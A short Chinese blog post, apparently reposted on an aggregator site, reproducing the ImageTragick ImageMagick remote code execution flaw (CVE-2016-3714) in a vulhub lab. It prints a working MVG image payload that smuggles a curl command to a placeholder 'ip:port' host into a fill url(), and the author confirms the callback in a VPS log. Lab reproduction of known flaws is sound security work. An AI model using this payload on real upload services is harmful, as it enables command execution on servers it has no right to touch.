Imagetragick RCE(CVE-2016–3714)复现

Posted jinqi520

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Imagetragick RCE(CVE-2016–3714)复现相关的知识,希望对你有一定的参考价值。

CVE-2016–3714:

闲着没事突然想起这个洞来,借用vulhub复现一下

poc有很多:https://github.com/ImageTragick/PoCs

我用的

技术图片

 

 

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://127.0.0.1/oops.jpg"|curl "ip:port/image)‘
pop graphic-context

 

图片上传后,vps查看日志
技术图片

 

以上是关于Imagetragick RCE(CVE-2016–3714)复现的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2016-6662 mysql RCE测试

Java--Apache Shiro反序列化RCE--CVE-2016-4437

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现

Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)【原理扫描】 求救这个漏洞要怎么修复?

ImageTragick Exploit & Fix

OpenSSH客户端漏洞:CVE-2016-0777和CVE-2016-0778